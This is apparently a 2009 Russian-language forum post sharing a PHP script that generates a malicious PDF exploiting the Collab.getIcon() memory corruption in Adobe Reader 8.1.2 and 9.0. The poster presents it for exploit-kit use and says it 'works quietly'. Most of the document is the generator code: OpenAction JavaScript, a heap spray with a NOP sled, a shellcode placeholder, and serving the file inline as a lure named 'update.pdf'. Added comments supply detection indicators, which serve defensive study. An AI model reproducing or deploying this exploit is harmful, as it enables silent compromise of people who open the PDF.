Adobe Acrobat Reader 8.1.2 and 9.0 getIcon() Memory Corruption Exploit
19 мая, 2009
Цель: Adobe Acrobat Reader
Воздействие: Выполнение произвольного кода
накалякал кодес, решил выложить... работает тихо, без зависаний
обновляем связочки
19 мая, 2009
Цель: Adobe Acrobat Reader
Воздействие: Выполнение произвольного кода
накалякал кодес, решил выложить... работает тихо, без зависаний
обновляем связочки
Код:
<?php
/*
 * Generator for a malicious PDF aimed at the Collab.getIcon() memory
 * corruption in Adobe Reader 8.1.2 / 9.0 (the issue is widely tracked as
 * CVE-2009-0927). The script assembles a PDF skeleton with document-level
 * JavaScript, appends a heap-spray script as the JS stream, patches that
 * stream's /Length and serves the result as "update.pdf".
 *
 * Defender notes:
 *  - Detection: a PDF whose catalog carries /OpenAction with /S /JavaScript,
 *    a /Names -> /JavaScript name tree, the string "Collab.getIcon" and long
 *    runs of "%u9090" inside unescape() is characteristic of this exploit
 *    family. On the wire, a response with Content-Type application/pdf and
 *    Content-Disposition inline; filename=update.pdf (see the header() calls
 *    at the bottom) is a usable network indicator for this generator.
 *  - Mitigation: the vendor fix for this issue, or disabling Acrobat
 *    JavaScript, removes the code path the embedded script depends on.
 */
// Hides every notice/warning (including the undefined $name used below and
// any complaint from the malformed header() calls) so that nothing but the
// PDF bytes reaches the response body.
error_reporting(0);
// PDF skeleton, objects 1-13. Document-level JavaScript is referenced twice:
// via /OpenAction on the catalog (object 1) and via the /Names /JavaScript
// name tree (object 7 -> 10 -> 12 -> 13). $name is never assigned in this
// listing; the "\(\)" pair are PDF string escapes for literal parentheses.
// The "%????" on the second line is presumably the binary comment bytes of
// the original file mangled by the page encoding — unverified.
$pdf = "%PDF-1.3
%????
1 0 obj
<</OpenAction <</JS (this." . $name . "\(\))
/S /JavaScript
>>
/Threads 2 0 R
/Outlines 3 0 R
/Pages 4 0 R
/ViewerPreferences <</PageDirection /L2R
>>
/PageLayout /SinglePage
/AcroForm 5 0 R
/Dests 6 0 R
/Names 7 0 R
/Type /Catalog
>>
endobj
2 0 obj
[]
endobj
3 0 obj
<</Count 0
/Type /Outlines
>>
endobj
4 0 obj
<</Resources 8 0 R
/Kids [9 0 R]
/Count 1
/Type /Pages
>>
endobj
5 0 obj
<</Fields []
>>
endobj
6 0 obj
<<>>
endobj
7 0 obj
<</JavaScript 10 0 R
>>
endobj
8 0 obj
<</ProcSet [/PDF /Text /ImageB /ImageC /ImageI]
>>
endobj
9 0 obj
<</Rotate 0
/Parent 4 0 R
/Resources 8 0 R
/TrimBox [0 0 595.28000 841.89000]
/MediaBox [0 0 595.28000 841.89000]
/pdftk_PageNum 1
/Contents 11 0 R
/Type /Page
>>
endobj
10 0 obj
<</Names [(New_Script) 12 0 R]
>>
endobj
11 0 obj
<</Length 31
>>
stream
0 0 595.28000 841.89000 re W n
endstream
endobj
12 0 obj
<</JS 13 0 R
/S /JavaScript
>>
endobj
13 0 obj
<</Length %LENGTH%
>>
stream
";
// JavaScript payload, stored verbatim (single-quoted, nothing interpolates).
// "тут шелкодик" is Russian for "shellcode goes here" — a placeholder; no
// payload ships with this listing. spary() is a textbook heap spray:
// `garbage` = 0x9090 NOP sled + shellcode, `block` is doubled until it is
// about 0x40000 chars and 180 copies are parked in `memory`; then an Array
// of 4012 "\n\n\n\n" entries is implicitly coerced to a comma-joined string
// and passed to Collab.getIcon() with a "_N.bundle" suffix — the oversized
// argument that triggers the memory corruption named in the page title.
// Analysts should treat "Collab.getIcon" plus "%u9090" runs as the signature.
$script = 'function spary() {
var shellcode = unescape("тут шелкодик");
garbage = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090") + shellcode;
nopblock = unescape("%u9090%u9090");
headersize = 10;
acl = headersize+garbage.length;
while (nopblock.length<acl) nopblock+=nopblock;
fillblock = nopblock.substring(0, acl);
block = nopblock.substring(0, nopblock.length-acl);
while(block.length+acl<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<180;i++) memory[i] = block + garbage;
var buffersize = 4012;
var buffer = Array(buffersize);
for (i=0; i<buffersize; i++)
{
buffer[i] = unescape("%0a%0a%0a%0a");
}
Collab.getIcon(buffer+"_N.bundle");
}
spary();';
// Byte length of the script; it fills the %LENGTH% placeholder of object 13.
$len = strlen($script);
// The script becomes the body of the object-13 stream.
$pdf .= $script;
// Close the stream, then add the /Info dictionary (object 14), the xref
// table and the trailer. The xref offsets and startxref are hard-coded for
// one specific byte layout of the objects above; they are not recomputed
// after the script length or the mangled second line change, so the table
// is presumably stale — viewers that rebuild a damaged xref may still open
// the file (unverified here).
$pdf .= "
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (2008312053854)
/CreationDate (2008312053854)
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000261 00000 n
0000000279 00000 n
0000000324 00000 n
0000000397 00000 n
0000000428 00000 n
0000000448 00000 n
0000000487 00000 n
0000000553 00000 n
0000000731 00000 n
0000000781 00000 n
0000000862 00000 n
0000000909 00000 n
0000004186 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
4374
%%EOF
";
// Patch object 13's /Length so it matches the actual script byte count.
$pdf = str_replace("Length %LENGTH%","Length ".$len,$pdf);
// Serve the document inline as "update.pdf" (a benign-looking lure name).
// The trailing "\r\n" in these header() arguments is redundant — PHP adds
// the line terminator itself — and header("\r\n") carries no field at all;
// how PHP treats these malformed calls depends on the version, and any
// warning is hidden by error_reporting(0) (unverified here).
header("Accept-Ranges: bytes\r\n");
header("Content-Length: ".strlen($pdf)."\r\n");
header("Content-Disposition: inline; filename=update.pdf");
header("\r\n");
header("Content-Type: application/pdf\r\n\r\n");
// Emit the PDF bytes and stop; nothing else may follow the body.
die($pdf);
?>